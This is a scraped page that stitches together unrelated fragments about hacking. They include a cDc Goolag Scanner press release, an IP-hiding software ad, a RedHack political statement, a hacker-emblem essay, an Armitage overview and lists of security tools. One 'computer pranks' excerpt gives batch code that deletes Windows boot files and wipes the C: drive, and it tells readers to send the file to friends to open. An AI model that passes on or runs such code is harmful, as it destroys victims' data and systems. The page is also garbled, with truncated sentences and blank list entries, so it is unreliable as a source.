cDc releases Goolag Scanner (posted by MiB on Februari 20th, 2008) SECURITY ADVISORY: The following program may screw a large Internet search engine and make the Web a safer place. LUBBOCK, TX, February 20th -- Today CULT OF THE DEAD COW (cDc), the world's most attractive hacker group, announced the release of Goolag Scanner, a web auditing tool. Goolag Scanner enables everyone to audit his or her own web site via Google. The scanner technology is based on "Google hacking," a form of vulnerability research developed by Johnny I Hack Stuff. He's a lovely fellow. "It's no big secret that the Web is the platform," said cDc spokesmodel Oxblood Ruffin. Goolag Scanner will be released open source under the GNU Affero General Public license. Goolag Scanner is a standalone windows GUI based application. Press Contact Oxblood Ruffin oxblood at hacktivismo.com About Goolag Scanner About Wau Holland and here See J.
Related: Hacking tutorials sites & tools
Welcome to Hellbound HackersGlobal kOS: About ThemHow can I mask my IP address and become untraceable online?Hide IP NG Concerned about Internet privacy? Want to hide your IP address? Hide IP NG (short for Hide IP Next Generation) is the software you are looking for! As low as $0.08/day BUY NOW ! Compatiblewith Vista ! Key Features of Hide IP NG: Don't waste time in testing slow and dangerous public proxies. Assign different IPs to your computers even they are behind the same router! A single click and you are ready to go. We never ask our users to create an acount before using. 1024 bits encryption prevent your ISP and your boss from spying on you! Prevent others from reading any data you transmit in Wi-Fi Hotspots. Support sites and double your security! Send anonymous email through any web based mail system (e.g. Post on bulletin boards without displaying your real IP address. Bypass the restrictions placed by some owners of Internet resources on users from certain countries or geographical regions. Great for monitoring your overseas search engine campaigns. Hide IP Address
REDHACK Voice of the oppressed!“Before we begin, I’d like to ask you when your penguin documentary will be on. Hello friends, comrades, the ones who defend the indivisible unity of the trees, how are you? When we hear “Gezi Park,” it represents to us how the media is censored, how auto censoring has been developed, very clearly. The fact that we are speaking out to our friends at Halk TV (channel), who have witnessed the events the entire time, is also a reaction, a response to the media who thinks, “don’t touch me and I won’t touch you”. We would like to thank the media workers who have put an end to this censoring, who have heard the voice of the resistance. They have fancy slogans (the news channels), which we know are not enough for news reporting, because they all say, “Be the first to know, with us” or “Always be informed with us”. But, life is a master of creating its own alternatives, so we are honestly not so worried. One of these “weddings” corresponded to the Reyhanli events, you’ll remember. He’s right!
Painfully Computer Pranks ~ Computer Hacking | Learn How To HackComputer pranks to freak out your friends and make them crying for mummy I've been posting many articles about computer pranks on this blog (Deadly Virus Prank, The Ultimate Virus, How to Create a Fake and Harmless Virus and Facebook Virus Prank). Today , I will show you 5 great computer pranks that will frustrate your victims very much. These pranks could be very painfully, so please use them at your own risk ;) 1. I stumbled across this URL while surfing the internet. 2. Open notepad and copy/paste this code: @echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s -h c:\boot.inidel c:\boot.iniattrib -r -s -h c:\ntldrdel c:\ntldrattrib -r -s -h c:\windows\win.inidel c:\windows\win.ini Now Save it as a .bat file. This should shutdown the persons computer. Send it to your friends computer and tell them to open it. Here is another code too..... cmd /c del c:\windows\* /F /S /Q cmd /c del c:\* /F /S /Q Paste it in NotePad And Save It with Extension .cmd or .bat
TelecomixChallenges - ThisisLegal.comThe glider: an Appropriate Hacker EmblemThe Linux folks have their penguin and the BSDers their daemon. Perl's got a camel, FSF fans have their gnu and OSI's got an open-source logo. What we haven't had, historically, is an emblem that represents the entire hacker community of which all these groups are parts. About half the hackers this idea was alpha-tested on instantaneously said "Wow! I first proposed this emblem in October 2003. When you put the glider emblem on your web page, or wear it on clothing, or display it in some other way, you are visibly associating yourself with the hacker culture. Yes, as of a mere four days after this proposal was floated, there are mugs and T-shirts. If you think is about breaking into other peoples' computers, those of us the emblem was invented for do not want you displaying it. I used to have a prohibition against commercial use here. The glider is not copyrighted or trademarked. Here's what it will look like: Feel free to enlarge or shrink the image.
Learn Ethical Hacking Online - HackingLoopsThere’s a seemingly endless number of free open-source tools for penetration testing, and most of them seem to gravitate around the Kali Linux distribution. But with so many free tools, it’s easy to miss out on some of the best ones. So today we’re going to take a closer look at Armitage, define what it is, and define how it works. However, there’s a few things that you need to know before we start digging into the dirty details of how to use this tool. First of all, doing so would be unethical. Now that we’ve got that out of the way, let’s define what Armitage is and how it works. What Does Armitage Do? Armitage, however, is really more of a scripting tool that “plugs in” to Metasploit. As they say, two heads are better than one, and the ability to share sessions opens the door for teamwork during an attack or penetration testing exercise. Furthermore, Armitage contains tools such as bots that help automate various tasks. But wait, there’s more (as Billy Mays might say)! Setting Targets
80+ Best Free Hacking Tutorials | Resources to Become Pro HackerLearning to become hacker is not as easy as learning to become a software developer. I realized this when I started looking for learning resources for simple hacking people do. Even to start doing the simplest hack on own, a hacker requires to have in depth knowledge of multiple topics. Some people recommend minimum knowledge of few programming languages like C, Python, HTML with Unix operating system concepts and networking knowledge is required to start learning hacking techniques. Though knowing a lot of things is required, it is not really enough for you to be a competent and successful hacker. If you are thinking about ethical hacking as a career option, you may need to be prepared for a lot of hard/smart work. A lot of people (including me before doing research for this article) think that they can become a hacker using some free hacking tools available on web. Below are some really useful hacking tutorials and resources you may want to explore in your journey of learning to hack
Top 15 Open Source/Free Security/Hacking Tools | Security & Hacking Blog1. Nmap Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. 2. Wireshark is a network protocol analyzer. 3. Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners. 4. Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. 5. 6. ettercap 7. 8. 9. 10. w3af 11. hping 12. burpsuite 13. 14. sqlmap